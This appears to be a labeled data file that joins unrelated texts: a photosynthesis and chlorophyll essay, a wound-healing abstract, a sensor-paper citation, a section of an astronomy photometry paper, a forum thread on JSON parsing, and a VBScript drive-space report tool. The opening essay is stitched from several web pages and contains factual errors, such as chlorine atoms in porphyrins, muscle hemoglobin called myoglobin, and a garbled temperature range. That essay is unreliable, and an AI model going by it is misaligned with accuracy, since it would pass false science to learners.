pigment called chlorophyll, which colors the leaves green. Chlorophyll can make food the plant can use from carbon dioxide, water, nutrients, and energy from sunlight. This process is called photosynthesis. During the process of photosynthesis, plants release oxygen into the air. People and animals need oxygen to breathe. Disclaimer/Credits Copyright © 2009 Missouri Botanical Garden Chlorophyll is responsible for the lush green hues of many plants. Why do some plants appear green? Green plants are green because they contain a pigment called chlorophyll. Chlorophyll absorbs certain wavelengths of light within the visible light spectrum. As shown in detail in the absorption spectra, chlorophyll absorbs light in the red (long wavelength) and the blue (short wavelength) regions of the visible light spectrum. Green light is not absorbed but reflected, making the plant appear green. Chlorophyll is found in the chloroplasts of plants. There are various types of chlorophyll structures, but plants contain chlorophyll a and b. These two types of chlorophyll differ only slightly, in the composition of a single side chain. Absorption spectra showing how the different side chains in chlorophyll a and chlorophyll b result in slightly different absorptions of visible light. Light with a wavelength of 460 nm is not significantly absorbed by chlorophyll a, but will instead be captured by chlorophyll b, which absorbs strongly at that wavelength. The two kinds of chlorophyll in plants complement each other in absorbing sunlight. Plants are able to satisfy their energy requirements by absorbing light from the blue and red parts of the spectrum. However, there is still a large spectral region between 500 and 600 nm where chlorophyll absorbs very little light, and plants appear green because this light is reflected. What is chlorophyll? Chlorophyll is a compound that is known as a chelate. A chelate consists of a central metal ion bonded to a large organic molecule, composed of carbon, hydrogen, and other elements such as oxygen and nitrogen. Chlorophyll has magnesium as its central metal ion, and the large organic molecule to which it bonds is known as a porphyrin. The porphyrin contains four nitrogen atoms bonded to the magnesium ion in a square planar arrangement. Chlorophyll occurs in a variety of forms. The structure of chlorophyll a. Chlorophyll does not contain chlorine as the name might suggest; the chloro- portion stems from the Greek chloros, which means yellowish green. The element chlorine derives its name from the same source, being a yellowish-green gas. How do birds and animals see plants? Vegetation will not appear to animals as it does to us. Although our color perception is the most advanced amongst mammals, humans have less effective color vision than many birds, reptiles, insects and even fish. Humans are trichromats, sensitive to three fundamental wavelengths of visible light. Our brains interpret color depending on the ratio of red, green and blue light. Some insects are able to see ultraviolet light. Birds are tetrachromatic, able to distinguish four basic wavelengths of light, sometimes ranging into ultraviolet wavelengths, giving them a far more sensitive color perception. It is hard for us to imagine how the world appears to birds, but they will certainly be able to distinguish more hues of green than we do, and so are far more able to distinguish between types of plants. We can speculate that this is of great benefit when choosing where to feed, take shelter and rear young. Aquatic creatures, from fish to the hyperspectral mantis shrimp (which distinguishes up to twelve distinct wavelengths of light) are uniquely tuned to the colors of their environment. The pages on animals include more information on the variety of color vision in the animal kingdom. The vivid colors of fall leaves emerge as yellow and red pigments, usually masked by chlorophyll, are revealed by its absence. Chlorophyll decomposes in bright sunlight, and plants constantly synthesize chlorophyll to replenish it. In the fall, as part of their preparation for winter, deciduous plants stop producing chlorophyll. Our eyes are tuned to distinguish the changing colors of the plants, which provide us with information such as when fruits are ripe and when the seasons are starting to change. Apart from coloring, has chlorophyll any other role? The green color of chlorophyll is secondary to its importance in nature as one of the most fundamentally useful chelates. It channels the energy of sunlight into chemical energy, converting it through the process of photosynthesis. In photosynthesis, chlorophyll absorbs energy to transform carbon dioxide and water into carbohydrates and oxygen. This is the process that converts solar energy to a form that can be utilized by plants, and by the animals that eat them, to form the foundation of the food chain. Chlorophyll is a molecule that traps light – and is called a photoreceptor. Photosynthesis Photosynthesis is the reaction that takes place between carbon dioxide and water, catalysed by sunlight, to produce glucose and a waste product, oxygen. The chemical equation is as follows: Glucose can be used immediately to provide energy for metabolism or growth, or stored for use later by being converted to a starch polymer. The by-product oxygen is released into the air, and breathed in by plants and animals during respiration. Plants perform a vital role in replenishing the oxygen level in the atmosphere. In photosynthesis, electrons are transferred from water to carbon dioxide in a reduction process. Chlorophyll assists in this process by trapping solar energy. When chlorophyll absorbs energy from sunlight, an electron in the chlorophyll molecule is excited from a lower to a higher energy state. The excited electron is more easily transferred to another molecule. A chain of electron-transfer steps follows, ending when an electron is transferred to a carbon dioxide molecule. The original chlorophyll molecule is able to accept a new electron from another molecule. This ends a process that began with the removal of an electron from a water molecule. The oxidation-reduction reaction between carbon dioxide and water known as photosynthesis relies on the aid of chlorophyll. There are actually several types of chlorophyll, but all land plants contain chlorophyll a and b. These 2 types of chlorophyll are identical in composition apart from one side chain, composed of a -CH3 in chlorophyll a, while in chlorophyll b it is -CHO. Both consist of a very stable network of alternating single and double bonds, a structure that allows the orbitals to delocalize, making them excellent photoreceptors. The delocalised polyenes have very strong absorption bands in the visible light spectrum, making them ideal for the absorption of solar energy. The chlorophyll molecule is highly effective in absorbing sunlight, but in order to synthesize carbohydrates most efficiently, it needs to be attached to the backbone of a complex protein. This protein provides exactly the required orientation of the chlorophyll molecules, keeping them in the optimal position that enables them to react efficiently with nearby CO2 and H2O molecules. This bacterial photoreceptor protein forms the backbone for a number of chlorophyll molecules. The basic structure seen in the chlorophyll molecule recurs in a number of molecules that assist in biochemical oxidation-reduction reactions, because it is ideally suited to promote electron transfer. Heme consists of a porphyrin similar to that in chlorophyll with an iron (II) ion at its center. Heme is bright red, the pigment that characterizes red blood. In the red blood cells of vertebrates, heme is bound to proteins to form hemoglobin. Oxygen enters the bloodstream in the lungs, gills or other respiratory surfaces and combines with hemoglobin. This oxygen is carried round the body of the organism in the bloodstream and released in the tissues. Hemoglobin in the muscle cells is known as myoglobin, a form that enables the organism to store oxygen as an electron source, ready for energy-releasing oxidation-reduction reactions. Commercial pigments Chlorophyll is a pigment that causes a green colour. Chlorophyll as a green dye has been used commercially in processed foods, toothpaste, soaps and cosmetics. Commercial pigments with structures similar to chlorophyll have been produced in a range of colors. In some, the porphyrin is modified, for example by replacing the chlorine atoms with hydrogen atoms. In others, different metal ions may be present. Phthalocyanine is a popular bright blue pigment with a copper ion at the center of the porphyrin. Phthalocyanine is a blue pigment. Green plants have the ability to make their own food. They do this through a process called photosynthesis, which uses a green pigment called chlorophyll. A pigment is a molecule that has a particular color and can absorb light at different wavelengths, depending on the color. There are many different types of pigments in nature, but chlorophyll is unique in its ability to enable plants to absorb the energy they need to build tissues. Chlorophyll is located in a plant’s chloroplasts, which are tiny structures in a plant’s cells. This is where photosynthesis takes place. Phytoplankton, the microscopic floating plants that form the basis of the entire marine food web, contain chlorophyll, which is why high phytoplankton concentrations can make water look green. Chlorophyll’s job in a plant is to absorb light—usually sunlight. The energy absorbed from light is transferred to two kinds of energy-storing molecules. Through photosynthesis, the plant uses the stored energy to convert carbon dioxide (absorbed from the air) and water into glucose, a type of sugar. Plants use glucose together with nutrients taken from the soil to make new leaves and other plant parts. The process of photosynthesis produces oxygen, which is released by the plant into the air. Chlorophyll gives plants their green color because it does not absorb the green wavelengths of white light. That particular light wavelength is reflected from the plant, so it appears green. Plants that use photosynthesis to make their own food are called autotrophs. Animals that eat plants or other animals are called heterotrophs. Because food webs in every type of ecosystem, from terrestrial to marine, begin with photosynthesis, chlorophyll can be considered a foundation for all life on Earth. Objective Role of the colour of light during Photosynthesis Did you know that the colour of light plays an important role during photosynthesis? Yes, it does. Plants use only certain colours from light for the process of photosynthesis. The chlorophyll absorbs blue, red and violet light rays. Photosynthesis occurs more in blue and red light rays and less, or not at all, in green light rays. The light that is absorbed the best is blue, so this shows the highest rate of photosynthesis, after which comes red light. Green light cannot be absorbed by the plant, and thus cannot be used for photosynthesis. Chlorophyll looks green because it absorbs red and blue light, making these colours unavailable to be seen by our eyes. It is the green light which is not absorbed that finally reaches our eyes, making the chlorophyll appear green. Factors affecting Photosynthesis For a constant rate of photosynthesis, various factors are needed at an optimum level. Here are some of the factors affecting photosynthesis. • Light Intensity:An increased light intensity leads to a high rate of photosynthesis and a low light intensity would mean low rate of photosynthesis. • Concentration of CO2: Higher carbon dioxide concentration increases the rate of photosynthesis. Normally the carbon dioxide concentration of 0.03 to 0.04 percent is sufficient for photosynthesis. • Temperature:An efficient photosynthesis requires an optimum temperature range between 25 to 35oC. • Water: Water is an essential factor for photosynthesis. The lack of water also leads to a problem for carbon dioxide intake. If water is scarce, the leaves refuse to open their stomata to keep water they have stored inside. • Polluted Atmosphere:The pollutants and gases (impure carbon) settle on leaves and block the stomata, making it difficult to take in carbon dioxide. A polluted atmosphere can lead to a 15 percent decrease in the rate of photosynthesis. Learning Outcomes • Students understand the concept that light is necessary for photosynthesis. • Students understand the principle of photosynthesis and the factors affecting photosynthesis. • Students will be able to do the experiment more accurately in the real lab once they understand the steps through the animation and simulation. Disclaimer: This work has been submitted by a student. This is not an example of the work produced by our Essay Writing Service. You can view samples of our professional work here. Any opinions, findings, conclusions or recommendations expressed in this material are those of the authors and do not necessarily reflect the views of UK Essays. Light has a particulate nature and a wave nature. Light represents that part of the radiant energy having wavelengths visible to the naked eye, approximately 390 to 760 nm. This is a very narrow region of the electromagnetic spectrum. The particulate nature of light is usually expressed in statements that light comes in quanta or photons, discrete packets of energy, each having a specific associated wavelength. In other words, light can be defined as electromagnetic energy propagated in discrete corpuscles called quanta or photon. As the energetics of chemical reactions are usually described in terms of kilocalories per mole of the chemicals (1 mole = 6.02 x 1023 molecules). Therefore, light energies are usually described in terms of kilocalories per mole quantum or per einstein (1 mole quantum or 1 einstein = 6.02 x 1023 quanta). The colour of the light is determined by the wavelength (λ) of the light radiation. At any given wavelength, all the quanta have the same energy. The energy (E) of a quantum is inversely proportional to its wavelength. Thus the violet and blue wavelengths are more energetic than the longer orange and red ones. Therefore, the energy of blue light (λ = 420 nm or mµ) is in the order of 70 K-cal/einstein and that of red light (λ = 690 nm or mµ) about 40 K-cal/einstein. The symbol commonly used for quantum, hv, is derived from this relationship. In any wave propagation, the frequency (v) is inversely proportional to the wavelength. Since E α 1/ λ, then E α V. Plank’s constant (h) converts this to an equation E = hv. Thus hv, used to designate a quantum, refers to the energy content of the quantum. A fundamental principle of light absorption, often called as Einstein law, is that any pigment (coloured molecule) can absorb only one photon at a time and that this photon causes the excitation of one electron. Specific valence (bonding) electrons in stable ground state orbitals are then usually exited and each electron can be driven away from the positively charged nucleus for a distance corresponding to an energy exactly equal to the energy of the photon absorbed (Fig. 5-10). The pigment molecule is then in an excited state and it is this excitation energy that is used in photosynthesis. The relationship between the energies of light, both as calories per mole quanta (per Einstein) and as E ‘O values and the energies required to conduct certain reactions is shown in table 5-2. It is evident that energy of a red quantum is just sufficient to raise an electron from OH- to the reducing level of H2; a uv quantum contains nearly twice this amount of energy. Thus, there is enough energy in a quantum of light (barely enough in a red quantum) to split water. EMERSON EFFECT By experiments, it appears that the high energy of blue light absorbed by chlorophyll is not used efficiently. The basic requirement is for a basic number of quanta. Therefore, the energy of the quanta is unimportant provided they can be absorbed by the chlorophyll. Red quanta (40 Kcal/einstein) are as effective as blue quanta (70 Kcal/einstein), the extra energy of the blue quanta is wasted. Presumably if a quantum is of the appropriate wavelength to be absorbed, it will be effective. However, an important exception to this behavior is the so called red drop, a decided decrease in efficiency found in many organisms at the far red end of the absorption spectrum, usually over 685 nm. Emerson, working with an algal system found that two pigment systems and two light reactions participated in photosynthesis. When exposed to a wavelength more than 680 nm, a specific rate of photosynthesis was observed. Likewise when exposed to a wavelength less than 680 nm a little effect on photosynthesis resulted. However, when the system was exposed to light of both the wavelengths at the same time, the effect on photosynthesis exceeded the sum of the two effects caused separately. Thus Emerson concluded that the efficiency of red light at a wavelength of about 700 nm could be increased by adding shorter wavelength light (650 nrn). This proved that the rate of photosynthesis in light of the two wavelengths together was greater than the added rates of photosynthesis in either alone. This is known as the Emerson effect after its inventor. This provided the ground that the two pigment systems worked in cooperation with each other. The resultant increase in photosynthesis was due to synergism (Fig. 5-13). FACTORS AFFECTING PHOTOSYNTHESIS Several external and internal factors influence photosynthesis. Of the external factors, influencing photosynthesis, light quality and intensity, CO2 concentration, temperature, oxygen, concentration of water, wind speed and nutrient level, are most important. The internal factors include chlorophyll contents, stomatal behaviour, leaf water content and enzymes. Morphology of the plants also influences photosynthesis. Most of the internal factors are influenced by the external factors. However, several of these interact to influence the rate of photosynthesis. For instance, increase in CO2, concentration enhances photosynthesis but such an increase may also cause closure of stomata. Therefore, no net increase in photosynthetic rate is observed. In summary, it may be understood that no single factor should be taken in account to explain an increase in photosynthesis. Certain specific factors that affect photosynthetic pathways are briefly discussed as under: Temperature As described earlier, Blackmann was the first to recognize the interrelations between light intensity and temperature. When CO2 light and other factors are not limiting, the rate of photosynthesis increases with a rise in temperature between the physiological range of 5.35°C. Between 25-30°C photosynthesis usually has Q10 of about 2. Certain organisms can continue CO2 fixation at extraordinary extremes of temperature some conifers at -20oC and algae that inhabits hot springs, a temperatures in excess of 50°C. But in most plants, photosynthesis ceases or declines sharply beyond the physiological limit. Because above 40°C there is an abrupt fall in the rate and the tissues die. High temperatures, cause inactivation of enzymes thus affecting the enzymaticaily controlled dark reactions of photo­synthesis. Temperature range at which optimum photosynthesis can occur varies with the plant species e.g. some lichens can photosynthesize at 20°C while conifers can assimilate at 35°C. In nature the maximum rate of photosynthesis due to temperature is not realized because light or CO2 or both are limiting. The response curve of net photosynthesis to temperature is different from those of light and CO2. It shows minimum, optimum and maximum temperatures. Between the C3 and C4 plants, the former species have optimal rates from 20-25°C while the latter from 35-40°C. Similarly, temperature also influences the light (optimum at 30-35°C) and dark respiration (optimum at 40-45°C). Oxygen Oxygen affects photosynthesis in several ways. Certain of the photosynthetic electron carriers may transfer electrons to oxygen, and ferredoxin in particular appears to be sensitive to O2. In bright light, high oxygen leads to irreversible damage to the photosynthetic system, probably by the oxidation of pigments. Carotenes in chloroplasts tend to protect chlorophylls from damage by solarization. The reaction of RuBP-case provides the most important site of O2 effect on photosyn­thesis. Oxygen competitively and reversibly inhibits the photosynthesis of C3 plants over all concen­trations of CO2; at high O2 (80% or over) irreversible inhibition also takes place. On the other hand, C4 plants do not release CO2 in photorespiration, therefore, photosynthesis in them is not affected until very high concentrations are reached which cause irreversible damage to the photosynthetic system (Fig. 5-23). Carbon dioxide concentrations Under field conditions, CO2 concentration is frequently the limiting factor in photosynthesis. The atmospheric concentration of about 0.033% (330 ppm) is well below C O2 saturation, for most plants. Some do not saturate until a concentration of 10 to 100 times this is reached. Characteristic CO2 saturation curves are shown in (Fig. 5-24). Photosynthesis is much affected by CO2 at low concentrations but is more closely related to light intensity at higher concentrations. At reduced CO2 concentrations the part of carbon may change dramatically because glycolate production results due to increased relative level of 02. As CO2 concentration is reduced, the rate of photosynthesis slows until it is exactly equal to the rate of photorespiration. This CO2 concentration at which CO2 uptake and out put are equal, is called the CO2 compensation point. The CO2 compensation point of C4 plants, which do not release CO2 in photorespiration, is usually very low (i.e. from 2-5 ppm CO2). Light The photosyntheticaliy active spectrum of light is between 400-700 nm. Green light (550 nm) plays no important role in photosynthesis. Light supplies the energy for the process and varies in intensity, quality and duration. Intensity When CO2 and temperature are not limiting and light intensities are low, the rate of photosynthesis increases with an increase in its intensity. At a point saturation may be reached, when further increase in light intensity fails to induce any increase in photosynthesis. Optimum or saturation intensities may vary with different plant species e.g. C3 and C4 plants. The former become saturated at levels considerably lower than full sunlight but the later are usually not saturated at full sunlight. When the intensity of light falling on a photosynthesizing organ is increased beyond a certain point, the cells of that organ become vulnerable to chlorophyll catalyzed photooxidations. Conse­quently these organs begin to consume O2 instead of CO2 and the CO2 is released. Photooxidation is maximal when O2 is present or carotenoids are absent or CO2 concentration is low. Duration Generally a plant will accomplish more photosynthesis when exposed to long periods of light. Uninterrupted and continuous photosynthesis for relatively long periods of time may be sustained without any visible damage to the plant. If the light source is removed, the rate of CO2 fixation falls to zero immediately. The light compensation point is that at which photosynthesis equals respiration and no net gas exchange occurs. The light compensation point of shade tolerant plants is much lower than that of sun plants. Water Water is an essential raw material in carbon assimilation. Less than 1% of water absorbed by a plant is used in photosynthesis. Thus decrease of water of the soil from field capacity to permanent wilting percentage (PWP) results in decreased photosynthesis. The inhibitory effect is primarily due to dehydration of protoplasm and also closure of stomata. The removal of water from the protoplasm also affects its colloidal state, impairs enzymatic efficiency, inhibits vital processes like respiration, photosynthesis etc. The synthesis oforganic compound from carbon dioxide and water (with the reiease of oxygen)using light energy absorbed by chlorophyll is called as photosynthesis. Or through photosynthesis light energy is captured n then that enegy is converted into chemical energy and that energy is the need of organism to survive.plants are autotrophs and they get energy from sun light and they assemble the organic molecules from inorganic resources and this is the reason that’s why it is called as photosynthesis.it is a greek word PHOTO means light and SYNTHESIS means to put together. Ecological considerations in photosynthesis: Ecological consideration means the effect of light ,CO2, water etc. Chlorophyll is not the only pigment found in chloroplasts. There is also a family of orange and yellow pigments called carotenoids. Carotenoids include the carotenes, which are orange, and the xanthophylls, which are yellow. The principal carotene in chloroplasts is beta-carotene, which is located in the chloroplasts along with chlorophyll. At one time, the carotenoids were considered accessory pigments-it was believed that light energy absorbed by carotenoids was transferred to the chlorophylls for use in photosynthesis. It now appears that carotenoids have little direct role in photosynthesis, but function largely to screen the chlorophylls from damage by excess light (see Chapter 6). Carotenoid pigments are not limited to leaves, but are widespread in plant tissues. The color of carrot roots, for example, is due to high concentrations of beta-carotene in the root cells and lycopene, the red-orange pigment of tomatoes, is also a member of the carotenoid family. Lycopene and betacarotene are important because of their purported health benefits. Beta-carotene from plants is also the principal source of vitamin A, which plays an important role in human vision. Lycopene is an antioxidant that may help protect against a variety of cancers. Carotenes and xanthophylls are also responsible for the orange and yellow colors in autumn leaves. In response to shortening day length and cooler temperatures, the chloroplast pigments begins to break down. Chlorophyll, which normally masks the carotenoids, breaks down more rapidly than the carotenoids and the carotenoids are revealed in their entire autumn splendor. The red color that appears in some leaves at this time of the year is due to water-soluble anthocyanins, whose synthesis is promoted by the same conditions that promote the breakdown of chlorophyll. known as CO2 fertilization. In practice, the CO2 content may be increased by 150-200 ppm to a total of perhaps 1.5 times atmospheric levels, although some foliage plant growers may supplement with CO2 up to a total of 700-1,000 ppm. Do you need help with writing your essay? We have over 500 professional writers ready to help! Hire a writer Leave a Reply Your email address will not be published. Required fields are marked *
__label__pos
0.993465
Transforming Growth Factor-β and Endoglin Signaling Orchestrate Wound Healing Front Physiol. 2011 Nov 29;2:89. doi: 10.3389/fphys.2011.00089. eCollection 2011. Abstract Physiological wound healing is a complex process requiring the temporal and spatial co-ordination of various signaling networks, biomechanical forces, and biochemical signaling pathways in both hypoxic and non-hypoxic conditions. Although a plethora of factors are required for successful physiological tissue repair, transforming growth factor beta (TGF-β) expression has been demonstrated throughout wound healing and shown to regulate many processes involved in tissue repair, including production of ECM, proteases, protease inhibitors, migration, chemotaxis, and proliferation of macrophages, fibroblasts of the granulation tissue, epithelial and capillary endothelial cells. TGF-β mediates these effects by stimulating signaling pathways through a receptor complex which contains Endoglin. Endoglin is expressed in a broad spectrum of proliferating and stem cells with elevated expression during hypoxia, and regulates important cellular functions such as proliferation and adhesion via Smad signaling. This review focuses on how the TGF-β family and Endoglin, regulate stem cell availability, and modulate cellular behavior within the wound microenvironment, includes current knowledge of the signaling pathways involved, and explores how this information may be applicable to inflammatory and/or angiogenic diseases such as fibrosis, rheumatoid arthritis and metastatic cancer. Keywords: TGFβ; angiogenesis; endoglin; progenitor cells; stem cells; wound healing.
__label__pos
0.518826
@misc{Przesławski_Tomasz_Magnetic_2005, author={Przesławski, Tomasz and Wolkenberg, Andrzej and Kaniewski, Janusz and Regiński, Kazimierz and Jasik, Agata}, address={Wrocław}, access={Dla wszystkich w zakresie dozwolonego użytku}, year={2005}, description={Optica Applicata, Vol. 35, 2005, nr 3, s. 627-634}, language={eng}, abstract={In this paper we, describe the design and fabrication process of Hall and magnetoresistor cross-shaped sensors using In0.53Ga0.47As/InP layer structures as active media. The influence of geometric correction factor GH on sensitivity parameters of these devices has been investigated. The results have been used in order to optimize the structure design behavior at temperatures ranging from 3 to 300 K. The large changes of the galvanomagnetic parameters vs. magnetic field and temperature allow these devices to be used as signal and measurement magnetic field sensors.}, title={Magnetic field sensors based on undoped In0.53Ga0.47As/InP heterostructures fabricated by molecular beam epitaxy and metalorganic chemical vapor deposition}, type={artykuł}, contributor={Gaj, Miron. Redakcja}, contributor={Wilk, Ireneusz. Redakcja}, rights={Wszystkie prawa zastrzeżone (Copyright)}, publisher={Oficyna Wydawnicza Politechniki Wrocławskiej}, keywords={optyka, Hall sensors, magnetoresistors, InGaAs/InP heterostructures, electronic transport, geometric correction factor, molecular beam epitaxy (MBE), metalorganic chemical vapor deposition (MOCVD)}, }
__label__pos
0.867616
next previous Up: Starspot photometry with 2. Instrumentation and data quality 2.1. Filter systems Our new observations were obtained with three different automatic photoelectric telescopes (APT) in the years 1991-96: the 0.75-m Fairborn APT on Mt. Hopkins in Arizona, U.S.A. equipped with tex2html_wrap_inline3957 filters matching the Johnson-Cousins system, the 0.25-m Phoenix APT also on Mt. Hopkins but equipped with Johnson UBV, and the 0.8-m Catania APT on Mt. Etna in Sicily, Italy with UBV filters for the Johnson system. All measurements were made differentially with respect to a nearby comparison star. Table 2 (click here) identifies the comparison stars and the check stars and also gives the total number of obtained mean differential V magnitudes per star and per telescope (tex2html_wrap_inline4047 for the Fairborn APT, tex2html_wrap_inline4049 for the Phoenix-10, and tex2html_wrap_inline4051 for the Catania APT). Both APTs on Mt. Hopkins observed each program star differentially with respect to a comparison star and a check star in the following sequence: tex2html_wrap_inline4175, where N is a bright navigation star, CK is the check star, C the comparison star, S the sky background usually between the comparison and the variable star, and V the variable itself. One entry for n in Table 2 (click here) thus compromises at least three individual tex2html_wrap_inline4179 readings. In order to eliminate the datapoints grossly in error we applied a statistical procedure that eliminated all data with an internal standard deviation greater than tex2html_wrap_inline4181 as well as data that deviated from the rest by at least tex2html_wrap_inline4183 (see, e.g., Hall et al. 1986). While the 0.02-mag filtering excluded between tex2html_wrap_inline4185 of the whole data for a particular star the number of mean magnitudes excluded by the 3-tex2html_wrap_inline4045 procedure was usually just a few datapoints. We note that, before eliminating the bad points, the whole data set was phased with the most likely photometric period and then examined for possible eclipses and flares. The relative telescope zeropoints in the V bandpass have been determined from the seasonal averages of the check-minus-comp magnitudes of several groups that were on all three APTs simultaneously and agree within their formal uncertainties of around 0.01 mag. 2.2. The T7 APT on Mt. Hopkins The 0.75-m T7 APT was put into routine operation on JD 2 449 022 in 1993. During the first year of operation it had alignment problems with the optics that led to a reduced data precision. Altogether four problems (A-D) occured and their duration and influence on the data is identified in Table 3 (click here). Three of the four problems were caused by a filter-wheel malfunction that produced VVV photometry instead of tex2html_wrap_inline3957gif.     Time Influenc e Cause 2449+ on data A 144-164 No R and I data Filter wheel stuck at V B 235-246 No R and I data Filter wheel stuck at V C 312-322 No R and I data Filter wheel stuck at V D 600-850 tex2html_wrap_inline4149 increased Telescope out of focus Table 3: Problems encountered with the T7 APT After the obviously deviant R and I data had been eliminated we computed external uncertainties tex2html_wrap_inline4149 for all check-minus-comparison magnitudes. Such uncertainties allow a quick look at the data quality expected for the variable-minus-comp data from the T7 APT. In 1993, its mean external standard deviation of a "nightly mean'' from a yearly mean was tex2html_wrap_inline4203, tex2html_wrap_inline4203, and tex2html_wrap_inline4207 mag in V, R, and I, respectively. In the second year the telescope was continuously out of focus and the annual mean external standard deviation was still tex2html_wrap_inline4215, tex2html_wrap_inline4217, and tex2html_wrap_inline4219 mag for the three bandpasses. This has been fixed in early 1995 and the nightly mean external standard deviations decreased then to tex2html_wrap_inline4221, tex2html_wrap_inline4217, and tex2html_wrap_inline4217 mag in V, R, and I, respectively. By early 1996 the telescope has been continuously watched and the external uncertainties dropped to 0.006 in V and below 0.010 in R and I. Integration time was usually set to 10 s except for V410 Tau where 20 s were used. 2.3. The Phoenix APT on Mt. Hopkins The Phoenix-10 APT is already in routine operation since 1983 and is managed by Mike Seeds as a multi-user telescope (see Phoenix-10 Newsletter and Seeds 1995). Strassmeier & Hall (1988a) examined the data quality of the Phoenix-10 APT from its first four years of operation and found external uncertainties of tex2html_wrap_inline4239, tex2html_wrap_inline4241, and tex2html_wrap_inline4243 mag in V, B, and U, respectively. Integration time was set to 10 s for all targets. Recently, Henry (1995) compared the long-term external precision of the Phoenix-10 APT with APTs of larger aperture (the Vanderbilt/Tennessee State 0.4 m and the Tennessee State 0.8 m) and verified the telescope's long-term stability. 2.4. The Catania APT on Mt. Etna First Catania-APT data came from the fourth quarter in 1992. Its standard group observing sequence was set to tex2html_wrap_inline4251, with the same meaning for the symbols as above. The sky background is measured at a fixed position near each star. Each magnitude on the variable star consists of six readings, compared to four with the other APTs. Integration time in U, B, and V was set to 15, 10, and 10 s, respectively. The typical standard deviations of the averaged tex2html_wrap_inline4179 and tex2html_wrap_inline4261 magnitudes for stars brighter than tex2html_wrap_inline4263 mag are of the order of 0.015, 0.010, and 0.007 mag for U, B, and V, respectively. The accuracy of the standard V magnitude is 0.01 mag, for U-B about 0.02 mag, and for B-V about 0.01 mag. next previous Up: Starspot photometry with Copyright by the European Southern Observatory (ESO) [email protected]
__label__pos
0.551805
Question Craig Regester · Aug 30, 2017 Retrieving values from JSON %Library.DynamicObject (2017.1) Good afternoon -  I'm in the process of learning to make COS calls to REST-based web services and while I am having success, I'm struggling on how to parse out the results (I admit I'm very green at this): Here's the code retrieving the JSON response: w !,"Get the JSON" Set Result = {}.%FromJSON(Request.HttpResponse.Data) This has Result as a Library.DynamicObject. I can then write out the response using: w !,Result.%ToJSON() This works, I can see the response is valid and what I want. Here is the JSON returned (de-identified):   { "RecordIDs": [ { "ID": "1234", "Type": "INTERNAL" }, { "ID": "1234", "Type": "EXTERNAL" } ], "ContactIDs": null, "Items": [ { "ItemNumber": "320", "Value": null, "Lines": [ { "LineNumber": 0, "Value": "1", "Sublines": null }, { "LineNumber": 1, "Value": "100063287", "Sublines": null } ] } ] } What is the easiest method to get the LineNumber Values out? I could potentially have several so I'm trying to get an output kind of like Value1~Value2~Value3 so I can piece them out later. Appreciate any advice - I'll keep pluggin away on it.  0 0 1,214 Discussion (4)1 Log in or sign up to continue set obj = {"RecordIDs":[{"ID":"1234","Type":"INTERNAL"},{"ID":"1234","Type":"EXTERNAL"}],"ContactIDs":null,"Items":[{"ItemNumber":"320","Value":null,"Lines":[{"LineNumber":0,"Value":"1","Sublines":null},{"LineNumber":1,"Value":"100063287","Sublines":null}]}]} w obj.Items.%Get(0).Lines.%Get(0).LineNumber >0 w obj.Items.%Get(0).Lines.%Get(1).LineNumber >1 To iterate over arbitrary number of array elements use iterator: set iterator = obj.Items.%Get(0).Lines.%GetIterator() while iterator.%GetNext(.key,.line) { w line.LineNumber,! } >0 >1 Awesome, this is exactly what I was looking for! Thank you. I was getting close with %Get and the iterator but wasn't quite making the connection with the whole line.LineNumber part.   Thanks!!! Thanks for your answer as well! This is actually what we were already doing with 2015.1 when handling JSON. So moving into 2017.1, I was hoping to make more use of the built-in JSON handlers because the JSON response I posted was a rather simple one - some of our more complex responses has our string manipulations getting quite long-in-the-tooth.  I'd suggest in this case to take the original JSON String from Request.HttpResponse.Data and split it by "LineNumber": eg: set sep="""LineNumber"":" for line =2:1:$l(json,sep) set line(line)=+$p(json,sep,line) and you get  line=3 line(2)=0 line(3)=1 I admit it's not very object-ish but efficient
__label__pos
0.615672
By David Wiseman (Administrator)Created 03 Aug 2008, Modified 08 Nov 2009 My Rating: Vote Rating: (1 votes) Views:8202 Downloads:1078 Drive Space Report Language:  HTA Compatibility Windows XP Yes Windows 2003 Yes Windows 2000 Unknown Windows NT Unknown Vista Yes Windows 2008 Unknown Description Display a drive space report for multiple computers. This HTA can check the drives of multiple computers and produce a HTML report that will highlight any drives that are low on free space. The HTA also generates a CSV version of the report. Notes The Drive Space Report is a GUI script that allows you to view the disk drives and free space on several computers.  Just enter the computer name or IP Address, one per line and click the "Generate Report" button to display the report.  Click the "Download Report (CSV)" button to save the report in CSV (comma separated) format. drive space report   Code Line Numbers: On  Off      Plain Text <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <head> <title>WiseSoft Drive Space Report</title> <hta:application applicationname="WiseSoft Drive Space Report" scroll="yes" singleinstance="yes" windowstate="normal"> <style type="text/css"> body { background-color: #F2F2F2; font: bold 10pt arial,sans-serif; color:#787878; margin:0px; } table { width: 400; border: 2px solid; border-collapse: collapse; border-color: #696969; } th { border: 1px dotted #111111; border-color: #787878; color: #FFFFFF; font: bold 12pt arial,sans-serif; background-color: #787878; text-align: left; } td { border: 1px dotted #111111; border-color: #787878; font: bold 10pt arial,sans-serif; color: #787878; } .neutral { background-color: #FFFFE0; color: #787878; } .good { background-color: green; color: white; } .warning { background-color: yellow; color: black; } .critical { background-color: red; color: black; } .tableHead td { padding: 5px; font: bold 14pt arial,sans-serif; background-color: #787878; text-align: center; color: white; } h1 { background-color: #787878; color: white; font: bold 20pt arial,sans-serif; text-align: center; } </style> </head> <script language="VBScript"> Option Explicit ' ********** Constants ********** const bytesToMB = 1048576 const bytesToGB = 1073741824 const bytesToTB = 1099511627776 const warningLevel = 20 ' < 20% = warning (yellow) const criticalLevel = 10 ' < 10% = critical (red) const goodLevel = 50 ' > 50% = good (green) ' ********************************** sub GetDriveReportsHTML dim html, strComputer,strComputers strComputers = txtComputers.value for each strComputer in SPLIT(strComputers,chr(13)) strComputer = TRIM(REPLACE(strComputer,chr(10),"")) if strComputer <> "" then html = html & GetDriveReportHTML(strComputer) end if next report.InnerHTML = html end sub function ConvertToDiskUnit(byval value) IF (value/bytesToTb) > 1 THEN ConvertToDiskUnit = round(value / bytesToTB,1) & " TB" ELSEIF (value/bytesToGb) > 1 THEN ConvertToDiskUnit = round(value / bytesToGB,1) & " GB" ELSE ConvertToDiskUnit = round(value / bytesToMB,1) & " MB" END IF end function function GetDriveReportHTML(byval strComputer) Dim objWMIService, objItem, colItems Dim strDriveType, strDiskSize, htmlDriveReport ON ERROR RESUME NEXT Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") IF Err.Number <> 0 THEN GetDriveReportHTML = "<span class=""critical"">Error connecting to '" & strComputer & 